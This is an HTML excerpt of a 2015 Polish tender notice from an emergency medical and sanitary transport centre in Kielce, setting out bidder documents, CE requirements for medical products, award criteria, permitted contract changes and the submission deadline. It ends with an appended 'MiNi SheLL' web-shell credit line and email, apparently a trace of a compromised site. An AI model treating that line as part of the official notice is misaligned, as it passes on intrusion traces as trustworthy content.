<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Deklaracje zgodności dla wszystkich wyrobów oznakowanych znakiem CE, plus 
     certyfikat CE wystawiony przez jednostkę notyfikacyjną dla wyrobów sterylnych. W 
     przypadku wyrobów nie oznakowanych CE i nie podlegających deklaracji zgodności, czy 
     też wprowadzanych po raz pierwszy na terenie Polski, wymagane jest zgłoszenie, 
     potwierdzone wpisem do Rejestru  Wyrobów Medycznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji niezmienności cen netto - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty (w szczególności części dotyczącej przedmiotu umowy, terminów oraz wynagrodzenia), na podstawie, której dokonano wyboru Wykonawcy  w następującym zakresie:    
1)	Zmiany przywoływanych w przedmiotowej umowie ustaw oraz rozporządzeń, w przypadku uchwalenia nowych ustaw lub rozporządzeń mających odpowiednie zastosowanie (zmiany przepisów bądź wymogów szczególnych dotyczących przedmiotu zamówienia).
2)	Zmiany terminu wykonania przedmiotu zamówienia (terminu wynikającego z harmonogramu, terminu rozpoczęcia i zakończenia), w sytuacji gdyby wystąpiły okoliczności powodujące, że wykonanie zamówienia nie jest możliwe do wykonania w terminie, o którym mowa w SIWZ, z przyczyn leżących po stronie Dostawcy i Zamawiającego, przedłużenia się procedury przetargowej.
3)	Zmiany o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, z uwagi na niezależne od stron okoliczności - siła wyższa. Za okoliczności siły wyższej uznaje się między innymi: pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich powstające poza kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec. 
Zaistnienie siły wyższej powinno być udokumentowane przez Stronę powołującą się na nią.
4)	Strony umowy dopuszczają możliwość zmiany cen jednostkowych brutto w przypadku zmiany  stawki podatku  VAT,
5)	Ceny jednostkowe netto przedmiotu umowy mogą ulec zmianie po okresie niezmienności  ceny w przypadku zmiany  o (+, -) 10 % średniego kursu euro w odniesieniu do średniego kursu euro z dnia zawarcia umowy lub z dnia ostatniej zmiany ceny przedmiotu umowy w związku ze zmianą średniego kursu euro.
Średni kurs euro oznacza: oficjalny średni kurs wymiany EURO i Polskiego Złotego, który odpowiada kursowi średniemu pomiędzy oficjalnym kursem kupna i sprzedaży EURO i Polskiego Złotego ogłoszonym przez Narodowy Bank Polski. 

Zmiany zawartej umowy wymagają pisemnego uzasadnienia Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scrmits.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego w Kielcach, 25-040 Kielce, ul. Pakosz 72, Sekcja Zamówień Publicznych Inwestycji i Remontów, pokój nr 301..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 12:00, miejsce: Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego w Kielcach, 25-040 Kielce, ul. Pakosz 72, Sekcja Zamówień Publicznych Inwestycji i Remontów, pokój nr 301..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com